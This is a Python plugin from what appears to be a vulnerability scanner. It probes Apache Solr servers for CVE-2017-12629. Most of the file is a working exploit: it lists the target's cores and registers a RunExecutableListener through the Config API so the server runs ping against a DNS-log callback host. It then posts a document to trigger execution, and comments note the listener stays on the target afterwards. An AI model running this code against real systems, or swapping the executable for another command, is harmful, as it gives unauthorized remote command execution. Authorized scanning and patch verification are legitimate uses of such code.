#!/usr/bin/env python
# -*- coding: utf-8 -*-

__author__ = 'Ascotbe'
import requests
import json
import time
from ClassCongregation import VulnerabilityDetails,UrlProcessing,ErrorLog,WriteFile,Dnslog,randoms,ErrorHandling,Proxies
import urllib3
# Silence urllib3's InsecureRequestWarning for the whole process: the POST
# requests in medusa() below are sent with verify=False, which would otherwise
# emit this warning on every call.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class VulnerabilityInfo(object):
    """Metadata record for the Solr CVE-2017-12629 check plugin.

    ``info`` holds the static descriptive fields of the plugin plus the
    result text supplied by the caller, stored under ``details``.
    """

    def __init__(self, Medusa):
        # One literal instead of twelve assignments; key order is unchanged.
        self.info = {
            # CVE or CNVD id; 0 when neither exists, a CVE id takes priority.
            'number': "CVE-2017-12629",
            # Plugin author.
            'author': "Ascotbe",
            # Date the plugin was written.
            'create_date': "2020-2-19",
            # Disclosure date; the plugin date is used when it is unknown.
            'disclosure': '2017-10-26',
            # Plugin name.
            'algroup': "SolrRemoteCodeExecutionVulnerability2",
            # Vulnerability name.
            'name': 'Solr远程代码执行漏洞2',
            # Affected component.
            'affects': "Solr",
            # Vulnerability description.
            'desc_content': "原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过http收到一个XML/JSON响应来实现。",
            # Severity rating.
            'rank': "高危",
            # Remediation advice.
            'suggest': "尽快升级最新系统",
            # Affected versions.
            'version': "7.1.0之前版本",
            # Result text handed in by the caller.
            'details': Medusa,
        }


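def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Check one target for Solr CVE-2017-12629 and record a finding if confirmed.

    The check lists the Solr cores, registers a ``RunExecutableListener`` on
    one core through the Config API, posts a document to that core's update
    handler (the listener is bound to ``postCommit``), and then asks the
    DNS-log helper whether the callback host was looked up.

    Args:
        Url: Target URL; split into scheme, host and port by ``UrlProcessing``.
        Headers: Request headers supplied by the caller. Not modified here.
        proxies: Proxy setting, normalised by ``Proxies().result``.
        **kwargs: Passed through to ``VulnerabilityDetails``.

    Returns:
        None. A confirmed finding is written through ``VulnerabilityDetails``
        and ``WriteFile``; an exception raised inside the probe is reported
        through ``ErrorHandling`` and ``ErrorLog`` instead of propagating.
    """
    proxies=Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Fall back to the scheme's default port when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        base_url = scheme + "://" + url + ":" + str(port)
        # NOTE(review): this GET keeps certificate verification on while the
        # two POSTs below pass verify=False, so an HTTPS target with an
        # untrusted certificate fails here and is only logged as an error.
        step1 = requests.get(base_url + '/solr/admin/cores', timeout=6, proxies=proxies, headers=Headers).text
        data = json.loads(step1)
        if 'status' not in data:
            return
        cores = list(data['status'])
        if not cores:
            # No core reported: do not send requests to "/solr//config".
            return
        # The last listed core is used, as before. The name comes from the
        # target's response and is placed in the request path unescaped.
        name = cores[-1]
        payload_url = base_url + "/solr/" + name + "/config"
        payload_url2 = base_url + "/solr/" + name + "/update"
        DL = Dnslog()  # set up the DNS-log callback helper
        rm = randoms().result(10)
        # NOTE(review): nothing in this function removes the listener or the
        # document again; both presumably stay on the target after the check
        # and have to be cleaned up separately.
        data1='''{"add-listener":{"event":"postCommit","name":"'''+rm+'''","class":"solr.RunExecutableListener","exe":"ping","dir":"/usr/bin/","args":["'''+DL.dns_host()+'''"]}}'''
        data2='''[{"id":"'''+rm+'''"}]'''
        # Copy the caller's headers before adding the JSON headers. The
        # original aliased the dict, so every later user of the same Headers
        # object inherited Accept/Content-Type from this plugin.
        json_headers = dict(Headers)
        json_headers['Accept'] = 'application/json'
        json_headers["Content-Type"] = "application/json"
        # Author's note: the PoC itself works; the DNS-log side was unreliable.
        # verify=False: the responses below are not authenticated by TLS.
        resp = requests.post(payload_url, data=data1, headers=json_headers, proxies=proxies, timeout=6, verify=False)
        resp2 = requests.post(payload_url2, data=data2, headers=json_headers, proxies=proxies, timeout=6, verify=False)
        # Give the callback a moment to arrive before polling the DNS log.
        time.sleep(3)
        if DL.result():
            # resp.text / resp2.text are target-controlled and are stored
            # verbatim in the report.
            Medusa = "{}存在Solr远程代码执行漏洞(CVE-2017-12629)\r\n 验证数据:\r\n漏洞位置:{}\r\n模板返回值:{}\r\n执行结果:{}\r\n".format(url,payload_url,resp.text,resp2.text)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write()  # record the finding for this url
            WriteFile().result(str(url),str(Medusa))  # write the result to a file named after the url
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        ErrorLog().Write("Plugin Name:"+plugin_name+" || Target Url:"+url,e)  # persist the error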
